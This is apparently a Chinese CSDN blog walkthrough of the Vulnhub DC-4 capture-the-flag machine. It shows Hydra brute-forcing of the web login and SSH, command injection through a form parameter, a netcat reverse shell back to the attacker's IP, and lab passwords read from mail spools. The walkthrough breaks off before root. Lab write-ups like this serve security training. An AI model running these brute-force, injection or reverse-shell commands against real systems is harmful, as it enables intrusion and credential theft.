Vulnhub DC-4

最新推荐文章于 2024-07-30 21:21:24 发布

Part 03

最新推荐文章于 2024-07-30 21:21:24 发布

阅读量618

点赞数

文章标签： p2p sql c# DC靶机

本文链接：https://blog.csdn.net/qq_62260856/article/details/122959744

版权

这篇博客讲述了在Linux环境中通过多途径获取系统权限的过程，包括使用Hydra进行暴力破解、利用shell命令创建新管理员账号。同时，展示了如何查看并利用邮件系统中的信息，如通过root用户的邮件获取其他用户密码，从而进一步控制系统。

摘要由CSDN通过智能技术生成

描述：

只有一个标志，但从技术上讲，有多个入口点，就像上次一样，没有线索。

192.168.37.133

直接 submit 就可以登录

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f

radio=ls+-l&submit=Run

radio=du+-h&submit=Run

nc 192.168.37.128 6666 -e /bin/bash

python -c "import pty; pty.spawn('/bin/bash')"

三个可登录用户

到目前可能就只能爆破，而在根目录下找到两个敏感目录

root

home

但是 root 目录不够权限，而 home 目录可以进入，且发现该目录下的三个

192.168.37.133

#!/bin/bash
for i in {1..5}
do
         sleep 1
         echo "Learn bash they said."
         sleep 1
         echo "Bash is good they said."
done
         echo "But I'd rather bash my head against a brick wall."

hydra -l jim -P DC-4_passwd.txt 192.168.37.133 ssh

[22][ssh] host: 192.168.37.133 login: jim password: jibril04

ssh jim@192.168.37.133

Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100

登陆后提示发现是 Linux 系统且有一封邮件

cat mbox

这是邮件描述

From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
           (envelope-from <root@dc-4>)
           id 1hCiQe-0000gc-EC
           for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.

由于 Linux 系统

linux用户的邮件存在哪里,在Linux系统中收发及查看邮件_ssslience的博客-CSDN博客系收到邮件都会保存在“/var/spool/mail/[linux用户名]”文件中。linux用户的邮件存在哪里,在Linux系统中收发及查看邮件_ssslience的博客-CSDN博客

cat jim

From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
           (envelope-from <charles@dc-4>)
           id 1hCjIX-0000kO-Qt
            for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles